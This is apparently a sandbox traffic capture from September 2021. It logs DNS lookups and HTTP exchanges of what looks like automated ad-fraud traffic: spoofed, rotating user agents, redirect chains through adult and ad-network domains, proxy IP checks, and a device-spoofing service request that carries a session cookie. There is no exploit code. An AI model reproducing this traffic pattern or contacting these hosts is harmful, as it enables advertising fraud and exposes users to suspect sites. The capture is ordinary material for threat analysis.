Referer: http://topjav.ru/adv.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 302 Found
Date: Mon, 06 Sep 2021 09:50:56 GMT
Content-Type: text/plain
Content-Length: 0
Connection: keep-alive
cache-control: no-store, no-cache, must-revalidate, no-transform
pragma: no-cache
p3p: CP="NID DSP ALL COR"
set-cookie: csu=d454dd24-1c43-4e09-8be2-652f5402a994
location: https://xml.bid-engine.com/click?i=1j8Q5UdABVI_0
x-cache: Miss from cloudfront
via: 1.1 24562ce7bb1d06e6505e84aac2d66ac7.cloudfront.net (CloudFront)
x-amz-cf-pop: AMS50-C1
x-amz-cf-id: hROQOD1_-O1FQVY3WFU4T5W0lD4cJLYP78EaxscGlyPJcetyaGM7Og==
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=4nV1aczgxH%2BcMwqND9CbPRXqptc45h7BP%2FkSm7rjjFYd2gADWZk8mwIpup4frWFCd48Sr2TUCih2app%2FwwgtfrRBDpsuXliXKV%2BsHVBgcGWVwPWYaXIpYrtD2T19wL0%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 68a6cbc01f2f0c11-AMS
alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
-
GEThttp://elevisions.biz/redirect?tid=931632RequestGET /redirect?tid=931632 HTTP/1.1
Host: elevisions.biz
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; MALC; rv:11.0) like Gecko
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://hubporn.us/goadv.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
-
GEThttp://www3.freeslut.xyz/www3.phpRequestGET /www3.php HTTP/1.1
Host: www3.freeslut.xyz
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36/tTfCn4bx-57
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 403 Forbidden
Content-Type: text/html
Cache-Control: no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: 0
Server: BitNinja Captcha Server
Date: Mon, 06 Sep 2021 09:50:56 GMT
Content-Length: 13730
Connection: close
-
GEThttp://mobileoffcpi.com/gooffer.php?aff_id=123&id_offer=3661&gaid=54105aa2-5446-470c-a6b6-533bc1715671&may=89RequestGET /gooffer.php?aff_id=123&id_offer=3661&gaid=54105aa2-5446-470c-a6b6-533bc1715671&may=89 HTTP/1.1
Host: mobileoffcpi.com
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Linux; Android 9; PAR-AL00 Build/HUAWEIPAR-AL00) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/81.0.4044.138 Mobile Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
X-Requested-With: com.android.chrome
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en-GB;q=0.9,en;q=0.8
ResponseHTTP/1.1 200 OK
Server: nginx
Date: Mon, 06 Sep 2021 09:51:00 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Content-Encoding: gzip
-
GEThttp://mobileoffcpi.com/favicon.icoRequestGET /favicon.ico HTTP/1.1
Host: mobileoffcpi.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Linux; Android 9; PAR-AL00 Build/HUAWEIPAR-AL00) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/81.0.4044.138 Mobile Safari/537.36
Accept: image/webp,image/apng,image/*,*/*;q=0.8
X-Requested-With: com.android.chrome
Referer: http://mobileoffcpi.com/gooffer.php?aff_id=123&id_offer=3661&gaid=54105aa2-5446-470c-a6b6-533bc1715671&may=89
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en-GB;q=0.9,en;q=0.8
ResponseHTTP/1.1 200 OK
Server: nginx
Date: Mon, 06 Sep 2021 09:51:00 GMT
Content-Type: image/x-icon
Content-Length: 1150
Last-Modified: Fri, 15 Jun 2018 14:42:42 GMT
Connection: keep-alive
ETag: "5b23d062-47e"
Expires: Wed, 06 Oct 2021 09:51:00 GMT
Cache-Control: max-age=2592000
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Accept-Ranges: bytes
-
DNSajax.googleapis.comRequestajax.googleapis.comIN AResponseajax.googleapis.comIN A142.250.179.170
-
DNSweb4.sexybody.xyzRequestweb4.sexybody.xyzIN AResponseweb4.sexybody.xyzIN CNAMEsexybody.xyzsexybody.xyzIN A167.86.103.60
-
GEThttp://web4.sexybody.xyz/ungweb4.phpRequestGET /ungweb4.php HTTP/1.1
Host: web4.sexybody.xyz
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:50.0) Gecko/20100101 Firefox/50.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 200 OK
Server: nginx
Date: Mon, 06 Sep 2021 09:51:02 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Content-Encoding: gzip
-
DNSdkre4lyk6a9bt.cloudfront.netRequestdkre4lyk6a9bt.cloudfront.netIN AResponsedkre4lyk6a9bt.cloudfront.netIN A13.227.211.2dkre4lyk6a9bt.cloudfront.netIN A13.227.211.185dkre4lyk6a9bt.cloudfront.netIN A13.227.211.209dkre4lyk6a9bt.cloudfront.netIN A13.227.211.197
-
DNSjavsex.usRequestjavsex.usIN AResponsejavsex.usIN A207.180.237.38
-
DNSkiynew.comRequestkiynew.comIN AResponsekiynew.comIN A185.162.85.3kiynew.comIN A185.162.85.20kiynew.comIN A185.162.85.2kiynew.comIN A185.162.85.4kiynew.comIN A185.162.85.14kiynew.comIN A185.162.85.1kiynew.comIN A185.162.85.19
-
DNSalfad.proRequestalfad.proIN AResponsealfad.proIN CNAMEadserver-2084671375.us-east-1.elb.amazonaws.comadserver-2084671375.us-east-1.elb.amazonaws.comIN A107.21.8.49adserver-2084671375.us-east-1.elb.amazonaws.comIN A54.236.207.160adserver-2084671375.us-east-1.elb.amazonaws.comIN A52.21.78.9
-
DNSpornhub.bidRequestpornhub.bidIN AResponsepornhub.bidIN A207.180.237.38
-
DNSalfad.proRequestalfad.proIN AResponsealfad.proIN CNAMEadserver-2084671375.us-east-1.elb.amazonaws.comadserver-2084671375.us-east-1.elb.amazonaws.comIN A107.21.8.49adserver-2084671375.us-east-1.elb.amazonaws.comIN A54.236.207.160adserver-2084671375.us-east-1.elb.amazonaws.comIN A52.21.78.9
-
GEThttp://kiynew.com/cuload?a=1&e=aeyJwaWQiOjEwODU4MDQsInNpZCI6MTA5NTMwOCwid2lkIjoxOTYyNjYsImQiOiJwb3JuaHViLmJpZCIsImxpIjoxfQ==&tz=8&if=0RequestGET /cuload?a=1&e=aeyJwaWQiOjEwODU4MDQsInNpZCI6MTA5NTMwOCwid2lkIjoxOTYyNjYsImQiOiJwb3JuaHViLmJpZCIsImxpIjoxfQ==&tz=8&if=0 HTTP/1.1
Host: kiynew.com
Connection: keep-alive
Origin: http://pornhub.bid
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/8.0; .NET4.0C; .NET4.0E; InfoPath.3; Zoom 3.6.0; ms-office; MSOffice 15)
Accept: */*
Referer: http://pornhub.bid/index.html
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Mon, 06 Sep 2021 09:51:02 GMT
Content-Length: 0
Connection: keep-alive
-
GEThttp://alfad.pro/ad/ad?p=266933&w=622931&t=a6f043821a99138e&r=&vw=887&vh=537RequestGET /ad/ad?p=266933&w=622931&t=a6f043821a99138e&r=&vw=887&vh=537 HTTP/1.1
Host: alfad.pro
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:25.8) Gecko/20151126 Firefox/31.9 PaleMoon/25.8.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://alfad.pro/go/266933/622931
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 303 See Other
Date: Mon, 06 Sep 2021 09:51:02 GMT
Location: https://bongacams7.com/track?v=2&c=602941
Server: nginx
Content-Length: 0
Connection: keep-alive
-
GEThttp://alfad.pro/go/266933/627547RequestGET /go/266933/627547 HTTP/1.1
Host: alfad.pro
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:61.0) Gecko/20100101 Firefox/61.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 200 OK
Content-Encoding: gzip
Content-Type: text/html
Date: Mon, 06 Sep 2021 09:51:02 GMT
Server: nginx
Vary: Accept-Encoding
Content-Length: 270
Connection: keep-alive
-
GEThttp://pornhub.bid/adv.phpRequestGET /adv.php HTTP/1.1
Host: pornhub.bid
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.0.9895 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 200 OK
Server: nginx
Date: Mon, 06 Sep 2021 09:51:02 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Content-Encoding: gzip
-
GEThttp://retributionsaloon.xyz/RequestGET / HTTP/1.1
Host: retributionsaloon.xyz
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.186 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 200 OK
Server: nginx
Date: Mon, 06 Sep 2021 09:51:02 GMT
Content-Type: text/html
Content-Length: 928
Connection: close
Expires: Mon, 31 Dec 2001 23:59:59 GMT
Pragma: no-cache
Cache-Control: no-store, no-cache, pre-check=0, post-check=0
X-Content-Type-Options: nosniff
-
GEThttp://dkre4lyk6a9bt.cloudfront.net/?lerkd=936478RequestGET /?lerkd=936478 HTTP/1.1
Host: dkre4lyk6a9bt.cloudfront.net
Connection: keep-alive
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; CMDTDF; .NET4.0C; .NET4.0E)
Accept: */*
Referer: http://morenews.us/index.htm
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 200 OK
Content-Length: 48639
Connection: keep-alive
Date: Mon, 06 Sep 2021 09:51:02 GMT
access-control-allow-origin: *
Cache-Control: no-store, no-cache, proxy-revalidate, must-revalidate, private, no-transform
Content-Encoding: gzip
Pragma: no-cache
X-Cache: Miss from cloudfront
Via: 1.1 76fb21fcb70866221c67558e2f776541.cloudfront.net (CloudFront)
X-Amz-Cf-Pop: AMS54-C1
X-Amz-Cf-Id: DOdkCfxxE5UwE6pIuuTUaVj6ng2tZmFcSglfTHH4osiIUoxmyOIvbw==
-
GEThttp://javsex.us/index.htmRequestGET /index.htm HTTP/1.1
Host: javsex.us
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 200 OK
Server: nginx
Date: Mon, 06 Sep 2021 09:51:02 GMT
Content-Type: text/html
Content-Length: 287
Last-Modified: Fri, 02 Jul 2021 01:10:42 GMT
Connection: keep-alive
ETag: "60de6792-11f"
Accept-Ranges: bytes
-
GEThttp://d3ou4areduq72f.cloudfront.net/?rauod=934932RequestGET /?rauod=934932 HTTP/1.1
Host: d3ou4areduq72f.cloudfront.net
Connection: keep-alive
User-Agent: Mozilla/5.0 (Linux; Android 5.0.2; SAMSUNG-SM-G920A Build/LRX22G) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/3.0 Chrome/38.0.2125.102 Mobile Safari/537.36
Accept: */*
Referer: http://getauohome.xyz/index.html
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 200 OK
Content-Length: 48641
Connection: keep-alive
Date: Mon, 06 Sep 2021 09:51:02 GMT
access-control-allow-origin: *
Cache-Control: no-store, no-cache, proxy-revalidate, must-revalidate, private, no-transform
Content-Encoding: gzip
Pragma: no-cache
X-Cache: Miss from cloudfront
Via: 1.1 7759c849c7040f0b6b78f9d2199c04cb.cloudfront.net (CloudFront)
X-Amz-Cf-Pop: AMS50-C1
X-Amz-Cf-Id: 5zPr1sdLicztGT0ARRmGbZnlQdYIX4gZcPSpCXlyWo4hJPIDBnpTeg==
-
DNSlumtest.comRequestlumtest.comIN AResponselumtest.comIN A3.94.72.89lumtest.comIN A3.94.40.55
-
GEThttp://lumtest.com/myip.jsonRequestGET /myip.json HTTP/1.1
Connection: close
Host: lumtest.com
ResponseHTTP/1.1 200 OK
Server: nginx
Date: Mon, 06 Sep 2021 09:51:03 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 205
Connection: close
Cache-Control: no-store
Access-Control-Allow-Origin: *
-
DNSwww.brewerstrattonpm.comRequestwww.brewerstrattonpm.comIN AResponsewww.brewerstrattonpm.comIN A67.227.137.208
-
DNSlumtest.comRequestlumtest.comIN AResponselumtest.comIN A3.94.40.55lumtest.comIN A3.94.72.89
-
DNSnsparket.topRequestnsparket.topIN AResponsensparket.topIN A172.67.192.135nsparket.topIN A104.21.52.2
-
DNS166877.tctm.coRequest166877.tctm.coIN AResponse166877.tctm.coIN CNAMEdrb0k2mg1d7gh.cloudfront.netdrb0k2mg1d7gh.cloudfront.netIN A52.222.139.56drb0k2mg1d7gh.cloudfront.netIN A52.222.139.104drb0k2mg1d7gh.cloudfront.netIN A52.222.139.20drb0k2mg1d7gh.cloudfront.netIN A52.222.139.36
-
GEThttp://lumtest.com/myip.jsonRequestGET /myip.json HTTP/1.1
Connection: close
Host: lumtest.com
ResponseHTTP/1.1 200 OK
Server: nginx
Date: Mon, 06 Sep 2021 09:51:06 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 205
Connection: close
Cache-Control: no-store
Access-Control-Allow-Origin: *
-
DNSifake.proRequestifake.proIN AResponseifake.proIN A45.76.155.77
-
GEThttp://ifake.pro/ip?serial_number=DX4RX001FF9YRequestGET /ip?serial_number=DX4RX001FF9Y HTTP/1.1
Host: ifake.pro
Accept: */*
Pragma: no-cache
Connection: keep-alive
Cookie: connect.sid=s%3A50BlUPy_fGZfC5HurCF2CmfNLcprx9aK.gNqvNrgCf9Tc7YZHVYobBRJu%2FLjESNsYRYv%2F5PPnv4o
User-Agent: iFakeProTools/5.9.6 CFNetwork/978.0.7 Darwin/18.7.0
Accept-Language: en-us
Accept-Encoding: gzip, deflate
Connection: keep-alive
ResponseHTTP/1.1 200 OK
X-Powered-By: iThanh
Vary: Origin, Accept-Encoding
Access-Control-Allow-Credentials: true
Strict-Transport-Security: max-age=5184000; includeSubDomains
Content-Type: text/html; charset=utf-8
Content-Length: 12
ETag: W/"c-T+jtdWoufQlJnZYss//Zp9PiBJU"
Date: Mon, 06 Sep 2021 09:51:06 GMT
Connection: keep-alive
-
DNSfrenzy.eygenci.comRequestfrenzy.eygenci.comIN AResponsefrenzy.eygenci.comIN A172.67.205.149frenzy.eygenci.comIN A104.21.85.117
-
DNSwww.google.nlRequestwww.google.nlIN AResponsewww.google.nlIN A142.251.36.3
-
DNShref.liRequesthref.liIN AResponsehref.liIN A192.0.78.26href.liIN A192.0.78.27
-
DNSjpsex.usRequestjpsex.usIN AResponsejpsex.usIN A207.180.237.38
-
DNSsexy-wife.comRequestsexy-wife.comIN AResponsesexy-wife.comIN A167.86.103.60
-
DNSgamesnews.usRequestgamesnews.usIN AResponsegamesnews.usIN A207.180.237.38
-
GEThttp://sexy-wife.com/adv.phpRequestGET /adv.php HTTP/1.1
Host: sexy-wife.com
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 200 OK
Server: nginx
Date: Mon, 06 Sep 2021 09:51:07 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Content-Encoding: gzip
-
GEThttp://jpsex.us/index.htmRequestGET /index.htm HTTP/1.1
Host: jpsex.us
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (iPad; CPU OS 6_1_3 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10B329 Safari/8536.25
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 200 OK
Server: nginx
Date: Mon, 06 Sep 2021 09:51:07 GMT
Content-Type: text/html
Content-Length: 264
Last-Modified: Tue, 01 Jun 2021 09:59:20 GMT
Connection: keep-alive
ETag: "60b604f8-108"
Accept-Ranges: bytes
-
GEThttp://gamesnews.us/index.htmlRequestGET /index.html HTTP/1.1
Host: gamesnews.us
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.85 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 200 OK
Server: nginx
Date: Mon, 06 Sep 2021 09:51:07 GMT
Content-Type: text/html
Content-Length: 264
Last-Modified: Sat, 28 Aug 2021 01:43:01 GMT
Connection: keep-alive
ETag: "612994a5-108"
Accept-Ranges: bytes
-
GEThttp://millustry.top/redirect?tid=927089RequestGET /redirect?tid=927089 HTTP/1.1
Host: millustry.top
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; SM-T230NU Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://jav8.us/adv.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 302 Found
Content-Type: text/plain
Content-Length: 0
Connection: keep-alive
Date: Mon, 06 Sep 2021 09:51:07 GMT
Server: openresty/1.17.8.2
cache-control: no-store, no-cache, must-revalidate, no-transform
Pragma: no-cache
P3P: CP="NID DSP ALL COR"
set-cookie: csu=1cbf50c7-60e2-4a14-b926-dc8b81e017f2
Location: https://www.adspredictiv.com/jump/next.php?r=4364547&pub_clickid=7250463090412482984&sub1=927089
X-Cache: Miss from cloudfront
Via: 1.1 f655cacd0d6f7c5dc935ea687af6f3c0.cloudfront.net (CloudFront)
X-Amz-Cf-Pop: AMS54-C1
X-Amz-Cf-Id: vH-F62a4x1MLtDOAILTXhwEtKCWqjrSFFmahZrhDgcAUwfvLlTFgww==
-
DNSstats.g.doubleclick.netRequeststats.g.doubleclick.netIN AResponsestats.g.doubleclick.netIN CNAMEstats.l.doubleclick.netstats.l.doubleclick.netIN A173.194.69.156stats.l.doubleclick.netIN A173.194.69.155stats.l.doubleclick.netIN A173.194.69.154stats.l.doubleclick.netIN A173.194.69.157
-
DNSlumtest.comRequestlumtest.comIN AResponselumtest.comIN A3.94.40.55lumtest.comIN A3.94.72.89
-
GEThttp://lumtest.com/myip.jsonRequestGET /myip.json HTTP/1.1
Connection: close
Host: lumtest.com
ResponseHTTP/1.1 200 OK
Server: nginx
Date: Mon, 06 Sep 2021 09:51:11 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 205
Connection: close
Cache-Control: no-store
Access-Control-Allow-Origin: *
-
DNSapi.ipify.orgRequestapi.ipify.orgIN AResponseapi.ipify.orgIN CNAMEnagano-19599.herokussl.comnagano-19599.herokussl.comIN CNAMEelb097307-934924932.us-east-1.elb.amazonaws.comelb097307-934924932.us-east-1.elb.amazonaws.comIN A23.21.224.49elb097307-934924932.us-east-1.elb.amazonaws.comIN A50.19.119.155elb097307-934924932.us-east-1.elb.amazonaws.comIN A54.243.117.237elb097307-934924932.us-east-1.elb.amazonaws.comIN A50.16.248.208elb097307-934924932.us-east-1.elb.amazonaws.comIN A50.17.226.156elb097307-934924932.us-east-1.elb.amazonaws.comIN A54.235.247.117elb097307-934924932.us-east-1.elb.amazonaws.comIN A23.21.173.155elb097307-934924932.us-east-1.elb.amazonaws.comIN A54.235.88.121
-
GEThttp://api.ipify.org/RequestGET / HTTP/1.1
Host: api.ipify.org
Connection: keep-alive
Accept-Encoding: gzip,deflate
ResponseHTTP/1.1 200 OK
Server: Cowboy
Connection: keep-alive
Content-Type: text/plain
Vary: Origin
Date: Mon, 06 Sep 2021 09:51:14 GMT
Content-Length: 12
Via: 1.1 vegur
-
DNSlumtest.comRequestlumtest.comIN AResponselumtest.comIN A3.94.40.55lumtest.comIN A3.94.72.89
-
DNSstats.g.doubleclick.netRequeststats.g.doubleclick.netIN AResponsestats.g.doubleclick.netIN CNAMEstats.l.doubleclick.netstats.l.doubleclick.netIN A173.194.69.154stats.l.doubleclick.netIN A173.194.69.155stats.l.doubleclick.netIN A173.194.69.157stats.l.doubleclick.netIN A173.194.69.156
-
DNSxxx4.sexybride.xyzRequestxxx4.sexybride.xyzIN AResponsexxx4.sexybride.xyzIN A194.59.164.58
-
DNSpuss8.usRequestpuss8.usIN AResponsepuss8.usIN A207.180.237.38
-
DNSwww.googletagmanager.comRequestwww.googletagmanager.comIN AResponsewww.googletagmanager.comIN CNAMEwww-googletagmanager.l.google.comwww-googletagmanager.l.google.comIN A216.58.208.104
-
DNS789ff.fr.amRequest789ff.fr.amIN AResponse789ff.fr.amIN A212.107.18.203
-
GEThttp://lumtest.com/myip.jsonRequestGET /myip.json HTTP/1.1
Host: lumtest.com
Connection: close
ResponseHTTP/1.1 200 OK
Server: nginx
Date: Mon, 06 Sep 2021 09:51:17 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 205
Connection: close
Cache-Control: no-store
Access-Control-Allow-Origin: *
-
GEThttp://789ff.fr.am/dt.phpRequestGET /dt.php HTTP/1.1
Host: 789ff.fr.am
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 403 Forbidden
Content-Type: text/html
Cache-Control: no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: 0
Server: BitNinja Captcha Server
Date: Mon, 06 Sep 2021 09:51:17 GMT
Content-Length: 57784
Connection: close
-
DNSlovekiss.xyzRequestlovekiss.xyzIN AResponselovekiss.xyzIN A207.180.237.38
-
DNShubtube.ruRequesthubtube.ruIN AResponsehubtube.ruIN A167.86.103.60
-
DNSdiabasewoodhouse.xyzRequestdiabasewoodhouse.xyzIN AResponsediabasewoodhouse.xyzIN A34.196.13.28
-
DNSmillustry.topRequestmillustry.topIN AResponsemillustry.topIN A13.227.222.110millustry.topIN A13.227.222.73millustry.topIN A13.227.222.102millustry.topIN A13.227.222.89
-
POSThttp://xxx4.sexybride.xyz/xxx4.phpRequestPOST /xxx4.php HTTP/1.1
Host: xxx4.sexybride.xyz
Connection: keep-alive
Content-Length: 68
Cache-Control: max-age=0
Origin: http://xxx4.sexybride.xyz
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_3) AppleWebKit/604.5.6 (KHTML, like Gecko) Version/11.0.3 Safari/604.5.6
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://xxx4.sexybride.xyz/xxx4.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 403 Forbidden
Content-Type: text/html
Cache-Control: no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: 0
Server: BitNinja Captcha Server
Date: Mon, 06 Sep 2021 09:51:17 GMT
Content-Length: 13730
Connection: close
-
GEThttp://diabasewoodhouse.xyz/?k=0b65f108a7b3f9a929ef97f0cbda9bac.1630921802.067.2.1.cmV0cmlidXRpb25zYWxvb24ueHl6&r=&z=-480RequestGET /?k=0b65f108a7b3f9a929ef97f0cbda9bac.1630921802.067.2.1.cmV0cmlidXRpb25zYWxvb24ueHl6&r=&z=-480 HTTP/1.1
Host: diabasewoodhouse.xyz
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:57.0) Gecko/20100101 Firefox/57.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 302 Found
Server: nginx
Date: Mon, 06 Sep 2021 09:51:17 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: tpp_u=0%3B1631008277; expires=Wed, 08-Sep-2021 09:51:17 GMT; path=/
Set-Cookie: tpp_6561771_l=1193%3B1631008277; expires=Wed, 08-Sep-2021 09:51:17 GMT; path=/
Set-Cookie: tpp_ov=102611%3B1631008277; expires=Wed, 08-Sep-2021 09:51:17 GMT; path=/
Set-Cookie: tpp_ov=102611%2C102652%3B1631008277; expires=Wed, 08-Sep-2021 09:51:17 GMT; path=/
Set-Cookie: tpp_ov=102611%2C102652%2C102907%3B1631008277; expires=Wed, 08-Sep-2021 09:51:17 GMT; path=/
Set-Cookie: tpp_bc=196265%3B1631008277; expires=Wed, 08-Sep-2021 09:51:17 GMT; path=/
Expires: Mon, 31 Dec 2001 23:59:59 GMT
Pragma: no-cache
Set-Cookie: tpp_oc=102652%3B1631008277; expires=Wed, 08-Sep-2021 09:51:17 GMT; path=/
Location: https://system.simpletraffic.co/forward.php?id=152233&source=38349&subsource=s6561771&cost=0.000600
-
GEThttp://puss8.us/index.htmRequestGET /index.htm HTTP/1.1
Host: puss8.us
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; NISSC; rv:11.0) like Gecko
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 200 OK
Server: nginx
Date: Mon, 06 Sep 2021 09:51:16 GMT
Content-Type: text/html
Content-Length: 282
Last-Modified: Wed, 07 Apr 2021 07:46:28 GMT
Connection: keep-alive
ETag: "606d6354-11a"
Accept-Ranges: bytes
-
GEThttp://hubtube.ru/adv.phpRequestGET /adv.php HTTP/1.1
Host: hubtube.ru
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 200 OK
Server: nginx
Date: Mon, 06 Sep 2021 09:51:16 GMT
Content-Type: text/html; charset=UTF-8
